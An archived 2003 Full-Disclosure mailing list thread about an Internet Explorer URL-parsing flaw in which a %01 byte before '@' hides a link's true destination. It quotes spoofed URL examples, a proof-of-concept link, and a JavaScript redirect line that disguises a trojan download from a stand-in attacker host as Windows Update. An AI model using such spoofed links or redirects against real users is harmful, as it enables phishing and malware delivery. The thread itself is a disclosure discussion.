hacking security forum

Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability

From: S G Masood <sgmasood@yahoo.com>
Date: Tue Dec 09 2003 - 13:00:51 CST

--- Exibar <exibar@thelair.com> wrote:
> my favorite will be this one that I'm sure will
> circulate:
>
> http://www.microsoft.com%01@www.linux.org
>
> :-)

http://www.microsoft.com%01@www.linux.org
 wont work until you
unescape('http://www.microsoft.com%01@www.linux.org');

>
> ----- Original Message -----
> From: "S G Masood" <sgmasood@yahoo.com>
> To: <full-disclosure@lists.netsys.com>
> Sent: Tuesday, December 09, 2003 1:22 PM
> Subject: [Full-Disclosure] RE: FWD: Internet
> Explorer URL parsing
> vulnerability
>
>
> >
> > LOL. This is so simple and dangerous, it almost
> made
> > me laugh and cry at the same time. Most of you
> will
> > realise why...;D
> > The Paypal, AOL, Visa, Mastercard, et al email
> > scammers will have a harvest of gold this month
> with
> > lots of zombies falling for this simple technique.
> >
> > ># POC ##########
> >
> >http://www.zapthedingbat.com/security/ex01/vun1.htm
> >
> > Dont be surprised if your latest download from
> > http://www.microsoft.com turns out to be a trojan!
> >
> >
>
location.href=unescape('http://windowsupdate.microsoft.com%01@comedownloadan
> eviltrojanfromme.com);
> >
> >
> > --
> > S.G.Masood
> >
> > Hyderabad,
> > India
> >
> > PS: One more thing - no scripting required to
> exploit this.
> >
> > __________________________________
> > Do you Yahoo!?
> > Free Pop-Up Blocker - Get it now
> > http://companion.yahoo.com/
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.netsys.com/full-disclosure-charter.html
> >
> >
>

__________________________________
Do you Yahoo!?
Free Pop-Up Blocker - Get it now
http://companion.yahoo.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Received on Tue Dec 09 14:09:50 2003

This archive was generated by hypermail 2.1.8 : Tue Dec 09 2003 - 15:01:01 CST

Custom Search